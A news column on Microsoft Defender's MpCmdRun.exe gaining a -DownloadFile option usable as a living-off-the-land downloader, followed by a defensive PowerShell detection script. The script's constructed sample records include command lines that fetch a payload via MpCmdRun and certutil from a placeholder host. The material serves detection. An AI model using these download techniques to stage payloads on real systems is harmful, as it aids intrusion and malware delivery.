Earlier this week, the always informative Bleeping Computer reported that an update to Microsoft Defender Antivirus for Windows 10 users meant it could itself be used to download malware files. So, just how problematic is this and does it mean that Microsoft Defender Antivirus is now a security risk itself?
Microsoft Defender Antivirus can be used to download malicious files
The story hangs on the fact that an update to the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) means it can now download remote files. Remote files that could, potentially, be malicious in nature.
Indeed, to test this, Bleeping Computer did just that.
Using the new -DownloadFile command-line argument, running as an ordinary local user, reporters were able to make MpCmdRun.exe fetch the same WastedLocker ransomware sample that was used against Garmin in the recent high-profile attack.
This appears to be quite alarming, but is that really the case? Of course, anything that opens up a new pathway of attack has to be taken seriously.
However, there are a few caveats to be considered before getting too worried that your Windows 10 computer security system has just eaten itself.
Has your Windows 10 security software just eaten itself?
This does appear to be a case of a living-off-the-land binary, or lolbin if you like, threat: a legitimate, signed binary that ships with the operating system being abused for an attacker's purposes, which is harder to spot precisely because the binary is trusted.
However, any file downloaded through this route is still scanned by Microsoft Defender Antivirus on arrival and, where the engine recognises it as malicious, blocked from executing.
A Microsoft spokesperson confirmed as much when I asked for a statement: “Despite these reports, Microsoft Defender antivirus and Microsoft Defender ATP will still protect customers from malware. These programs detect malicious files downloaded to the system through the antivirus file download feature.”
So this is not a bypass of Windows 10 defenses; it is another way of staging a file on a machine the attacker already has a foothold on.
To download a file in the first place requires access to a local user account, whether admin or a limited one, and the downloaded file lands with that account's privileges. It can't, it would seem, be written to another user's folder or to any directory the attacker doesn't already have write access to.
Which means that privilege escalation doesn’t appear possible here.
Although I agree with Bleeping Computer that it does provide Windows 10 administrators with another executable to watch out for, and attackers with another to potentially exploit, I’m not going to be losing any sleep over this one.
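The executable-to-watch-out-for point is easy to turn into a concrete check. The PowerShell below is an added example, not code from the article, from Bleeping Computer or from Microsoft: it flags process-creation records in which MpCmdRun.exe was launched with the -DownloadFile argument, which has no business appearing on a machine nobody is deliberately administering that way. The records are plain objects with Image, CommandLine and User properties, the shape Sysmon Event ID 1 supplies; the three sample records are constructed, as are the host, user and version-folder names in them. The -url and -path parameters in the sample command line follow the usage Bleeping Computer reported.

```powershell
# Added example: detect MpCmdRun.exe being used as a downloader.
# Not part of the original article; sample data below is constructed.

function Test-MpCmdRunDownload {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [pscustomobject]$Record   # needs Image, CommandLine, User, Time
    )
    process {
        $image = [System.IO.Path]::GetFileName($Record.Image)
        # Match on the file name, not the full path: the engine's platform
        # folder under ProgramData changes its version suffix with each update.
        if ($image -ieq 'MpCmdRun.exe' -and
            $Record.CommandLine -imatch '-DownloadFile') {
            [pscustomobject]@{
                Time        = $Record.Time
                User        = $Record.User
                CommandLine = $Record.CommandLine
                Verdict     = 'Suspicious: MpCmdRun.exe used as a downloader'
            }
        }
    }
}

# Convert live Sysmon process-creation events (Event ID 1) into the record
# shape the filter expects. Only needed on a host with Sysmon installed.
function Get-SysmonProcessCreate {
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
    ForEach-Object {
        $d = @{}
        ([xml]$_.ToXml()).Event.EventData.Data |
            ForEach-Object { $d[$_.Name] = $_.'#text' }
        [pscustomobject]@{
            Time        = $d.UtcTime
            User        = $d.User
            Image       = $d.Image
            CommandLine = $d.CommandLine
        }
    }
}

# Constructed sample records (not real telemetry): one normal scan, one
# download via MpCmdRun.exe, one unrelated certutil download for contrast.
$platform = 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0'
$sample = @(
    [pscustomobject]@{ Time = '2020-09-02T10:01:00Z'; User = 'CORP\alice'
        Image = "$platform\MpCmdRun.exe"
        CommandLine = '"MpCmdRun.exe" -Scan -ScanType 1' },
    [pscustomobject]@{ Time = '2020-09-02T10:02:13Z'; User = 'CORP\alice'
        Image = "$platform\MpCmdRun.exe"
        CommandLine = '"MpCmdRun.exe" -DownloadFile -url http://example.test/payload.bin -path C:\Users\alice\Downloads\payload.bin' },
    [pscustomobject]@{ Time = '2020-09-02T10:03:40Z'; User = 'CORP\bob'
        Image = 'C:\Windows\System32\certutil.exe'
        CommandLine = 'certutil -urlcache -split -f http://example.test/x.bin x.bin' }
)

# Only the second record is reported.
$sample | Test-MpCmdRunDownload | Format-Table -AutoSize

# On a host with Sysmon: Get-SysmonProcessCreate | Test-MpCmdRunDownload
```

The same two conditions (image name MpCmdRun.exe, command line containing -DownloadFile) translate directly into a Sigma rule or a Defender for Endpoint advanced-hunting query over process-creation events; the filter is deliberately loose on the path so that a future platform update doesn't silently break it.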
The attack window, if you’ll pardon the pun, is somewhat limited, to say the least, and I suspect that it will have closed completely when the next Microsoft Defender Antivirus update comes along very shortly. I’m guessing this security hole won’t take two years for Microsoft to patch.